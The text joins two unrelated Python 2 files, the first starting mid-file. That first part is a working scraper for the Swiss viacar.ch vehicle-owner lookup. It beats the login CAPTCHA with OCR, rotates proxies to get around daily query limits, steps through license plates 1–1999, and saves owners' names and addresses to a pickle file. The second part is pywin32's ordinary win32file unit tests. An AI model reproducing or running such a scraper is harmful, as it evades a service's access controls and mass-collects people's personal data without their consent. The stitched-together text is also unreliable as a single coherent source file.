"limit": "Sie haben die Anzahl zulässiger Abfragen für heute erreicht.",
"result": "Suchergebnis f",
"timeout": "Die Zeit ist abgelaufen, bitte neu anmelden.",
"noresult": "Das Suchergebnis ist negativ ausgefallen.",
"login": "r die Anmeldung die oben angezeigte Nummer ein."}
# List of license numbers and owner : [(licenseNumber,owner),...]
ownerList = []
driver_threads = []
license_number_queue = Queue.Queue()
pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)'\
'/Tesseract-OCR/tesseract'
def init():
licenseNumbers = []
for i in range(1, 2000):
licenseNumbers.append(i)
for licenseNumber in licenseNumbers:
license_number_queue.put(licenseNumber)
def makelist(table):
result = []
allrows = table.findAll('tr')
firstItem = True
for row in allrows:
result.append([])
allcols = row.findAll('td')
for col in allcols:
# do not add the first item(its an empty list)
if firstItem:
firstItem = False
continue
thestrings = [unicode(s) for s in col.findAll(text=True)]
thetext = ''.join(thestrings)
regex = re.compile(r'[\n\r\t]')
thetext = regex.sub('', thetext)
result[-1].append(thetext)
return result
def save_car_owner(driver, licenseNumber):
time.sleep(1)
driver.find_element_by_id("TextBoxKontrollschild").clear()
driver.find_element_by_id("TextBoxKontrollschild").send_keys(licenseNumber)
driver.find_element_by_id("ButtonSuchen").click()
time.sleep(1)
source = driver.page_source
if source.find(dictMsgStr["noresult"]) != -1:
print "No result for license number: " + str(licenseNumber)
ownerList.append([[u'Art:', u''], [u'Name:', u''], [u'Strasse:', u''],
[u'Ort:', u''], ['LicenseNumber:', licenseNumber]])
driver.find_element_by_id("ButtonWeiter").click()
time.sleep(0.5)
return True
if source.find(dictMsgStr["result"]) == -1:
print "Error strange page for license number: " + str(licenseNumber)
return False
driver.find_element_by_id("ButtonWeiter").click()
soup = BeautifulSoup(source)
tables = soup.find("table", attrs={"bgcolor": "whitesmoke"})
ownerData = makelist(tables)
ownerData.append(["licenseNumber", licenseNumber])
print ownerData
ownerList.append(ownerData)
return True
def solveCaptcha():
watchdog = time.time()
while not os.path.isfile(downloadPath):
if (time.time() - watchdog) > 8:
return None
time.sleep(0.05)
time.sleep(0.1)
frame = cv2.imread(downloadPath)
ret, thresh = cv2.threshold(frame, 80, 255, cv2.THRESH_BINARY)
thresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)
denoise = cv2.fastNlMeansDenoising(thresh, searchWindowSize=18, h=65)
return pytesseract.image_to_string(
Image.fromarray(denoise),
config="-c tessedit_char_whitelist=0123456789ABCDEFGHIJKLMNOPQRSTUVW"
"XYZ -psm 8")
def new_driver_thread(PROXY):
global login_active
# start of critical section(focus needed)
login_active = True
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--proxy-server=%s' % PROXY)
chrome_options.add_argument("--window-size=400,600")
driver = webdriver.Chrome(webdriverPath, chrome_options=chrome_options)
driver.implicitly_wait(60)
base_url = "https://www.viacar.ch"
verificationErrors = []
accept_next_alert = True
success = False
driver.get(base_url + "/eindex/Login.aspx?Kanton=ZH")
source = driver.page_source
# if we don't get to the login page something is fishy with the proxy
if source.find(dictMsgStr["login"]) == -1:
login_active = False
driver.quit()
time.sleep(1)
return
while not success:
try:
os.remove(downloadPath)
except BaseException:
pass
SecBild = driver.find_element_by_id("SecBild")
ActionChains(driver) \
.move_to_element(SecBild) \
.context_click(SecBild) \
.perform()
pyautogui.press('down')
time.sleep(0.2)
pyautogui.press('down')
time.sleep(0.2)
pyautogui.press('enter')
# time.sleep(1.5)
# pyautogui.typewrite(downloadPath)
# time.sleep(0.8)
time.sleep(1)
pyautogui.press('enter')
source = driver.page_source
searchStr = 'document.getElementById("'
pos1 = source.find(searchStr) + len(searchStr)
pos2 = source.find('"', pos1 + 1)
input_id = source[pos1:pos2]
captchaSolution = solveCaptcha()
# print captchaSolution
if captchaSolution is None:
login_active = False
driver.quit()
time.sleep(1)
return
driver.find_element_by_id(input_id).clear()
driver.find_element_by_id(input_id).send_keys(captchaSolution)
time.sleep(0.1)
driver.find_element_by_id("BtLogin").click()
source = driver.page_source
if source.find(dictMsgStr["search"]) == -1:
success = False
# if we are not back on the login page something is fishy with the
# proxy
if source.find(dictMsgStr["login"]) == -1:
login_active = False
driver.quit()
time.sleep(1)
return
else:
# print "Success!!!"
success = True
# End of critical section(no focus needed anymore)
login_active = False
source = driver.page_source
while source.find(dictMsgStr["search"]) != -1:
try:
licenseNumber = license_number_queue.get_nowait()
except Queue.Empty:
driver.quit()
time.sleep(1)
return
if licenseNumber is None:
driver.quit()
time.sleep(1)
return
if not save_car_owner(driver, licenseNumber):
# if we get a stange page instead of a result or noresult we store
# the license number back in the queue
license_number_queue.put(licenseNumber)
source = driver.page_source
# time.sleep(5) # Pause to allow you to inspect the browser.
driver.quit()
def main():
global login_active
proxythread = threading.Thread(target=fetch_mod.main)
proxythread.setDaemon(True)
proxythread.start()
init()
time.sleep(8)
initialActiveCount = threading.active_count()
while not license_number_queue.empty():
# get the next proxy
while True:
try:
proxyItem = fetch_mod.get_queue().get()
if proxyItem["type"] == "http":
break
except BaseException:
print "no proxys available!!!"
time.sleep(5)
PROXY = str(proxyItem["IP"]) + ":" + str(proxyItem["PORT"])
# wait with creating new thread until no login and less than x threads
while login_active or (
threading.active_count() - initialActiveCount) >= 6:
time.sleep(0.1)
driver_thread = threading.Thread(
name="driver_thread",
target=new_driver_thread,
args=(PROXY,)
)
driver_thread.start()
driver_threads.append(driver_thread)
# Yes we really have to wait over 30 seconds to catch all the results
# of the other threads
time.sleep(50)
for owner in ownerList:
print owner
with open('car_owners.pickle', 'wb') as f:
pickle.dump(ownerList, f)
if __name__ == '__main__':
start = time.time()
print "start"
main()
print "time: " + str(time.time() - start)
|
test_win32file.py
|
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
import win32timezone
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
val = str2bytes('\xFF')
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = val
self.failUnlessEqual(buffer[0], val)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes('\0\0')
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile( testName, desiredAccess, win32file.FILE_SHARE_READ, None, win32file.CREATE_ALWAYS, fileFlags, 0)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
win32file.WriteFile(h, data)
self.failUnless(win32file.GetFileSize(h) == len(data), "WARNING: Written file does not have the same size as the length of the data in it!")
# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(h, len(data)+10) # + 10 to get anything extra
self.failUnless(hr==0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data)//2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName))
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(size==newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()")
self.failUnless(attr==win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes")
h = None # Close the file by removing the last reference to the handle!
self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!")
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
f = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0)
try:
#Write some data
data = str2bytes('Some data')
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
#Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
#Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
if not issubclass(pywintypes.TimeType, datetime.datetime):
# maybe should report 'skipped', but that's not quite right as
# there is nothing you can do to avoid it being skipped!
return
filename = tempfile.mktemp("-testFileTimes")
now_utc = win32timezone.utcnow()
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None, win32file.CREATE_ALWAYS, 0, 0)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverseCompose - set local, confirm against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
if issubclass(pywintypes.TimeType, datetime.datetime):
from win32timezone import TimeZoneInfo
now = datetime.datetime.now(tz=TimeZoneInfo.local())
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
else:
rc, tzi = win32api.GetTimeZoneInformation()
bias = tzi[0]
if rc==2: # daylight-savings is in effect.
bias += tzi[-1]
bias *= 60 # minutes to seconds...
tick = int(time.time())
now = pywintypes.Time(tick+bias)
nowish = pywintypes.Time(tick+bias+1)
later = pywintypes.Time(tick+bias+120)
filename = tempfile.mktemp("-testFileTimes")
# Windows docs the 'last time' isn't valid until the last write
# handle is closed - so create the file, then re-open it to confirm.
open(filename,"w").close()
f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None,
win32con.OPEN_EXISTING, 0, None)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct))
self.failUnless( now <= ct <= nowish, (now, ct))
self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now,wt))
self.failUnless( now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
if issubclass(pywintypes.TimeType, datetime.datetime):
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
# Create the file and write shit-loads of data to it.
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
if not data is buffer:
self.fail("Unexpected result from ReadFile - should be the same buffer we passed it")
except win32api.error:
break
h.Close()
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE,
0, 0, 0)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error, details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo: pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = \
win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our confirm of
# reference counting should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(RuntimeError,
win32file.GetQueuedCompletionStatus, port, -1)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death = 0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX|
win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE|
win32pipe.PIPE_READMODE_MESSAGE|
win32pipe.PIPE_WAIT,
1, BUFSIZE, BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(target=self._IOCPServerThread, args=(handle,port, test_overlapped_death))
t.setDaemon(True) # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.isAlive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('', port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
#fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running,stopped))
t.start()
running.wait(2)
if not running.isSet():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
if not stopped.isSet():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS |
win32con.FILE_FLAG_OVERLAPPED,
None)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(target=self._watcherThreadOverlapped,
args=(td, hdir, changes))
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
while 1:
try:
print "waiting", dh
changes = win32file.ReadDirectoryChangesW(dh,
8192,
False, #sub-tree
flags)
print "got", changes
except:
raise
changes.extend(changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(dh,
buf,
False, #sub-tree
flags,
overlapped)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print "ERROR: Watcher thread timed-out!"
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print "FAILED to remove directory", dn
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.isAlive():
print "FAILED to wait for thread termination"
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error, details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
print "It appears this is not NTFS - cant encrypt/decrypt"
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes('some expected response'))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(True, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
self.assertEqual(self.request, str2bytes('some expected request'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(False, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
bytes = os.urandom(1024*1024)
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
s1.bind(self.addr)
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024*100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes('').join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
